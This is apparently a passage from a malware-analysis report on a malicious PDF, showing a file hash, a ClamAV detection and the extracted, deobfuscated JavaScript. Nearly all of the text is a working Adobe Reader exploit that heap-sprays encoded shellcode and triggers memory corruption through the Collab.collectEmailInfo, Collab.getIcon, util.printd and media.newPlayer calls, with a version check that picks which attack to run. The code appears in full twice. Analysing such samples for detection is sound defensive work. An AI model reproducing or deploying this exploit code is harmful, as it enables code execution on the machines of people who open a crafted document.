count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC1F9%uD2C3%uC5CF%uC8C9%uC080%u9BCE%u00A6");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if(varsion_array[0]<8){collab_email();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_geticon();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();}
printd();
}
PPPDDDFF();
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 52 at offset 0x16F | 5220 bytes |
SHA-256: af6d11495719ea23405af097f493c9e01726dab5b60d2e40d8d1533f3e36f0a6 |
|||
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
Carved artifact contains 9 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC8F9%uD1C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC1F9%uD2C3%uC5CF%uC8C9%uC080%u9BCE%u00A6");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape(" ");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if(varsion_array[0]<8){collab_email();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_geticon();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();}
printd();
}
PPPDDDFF();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.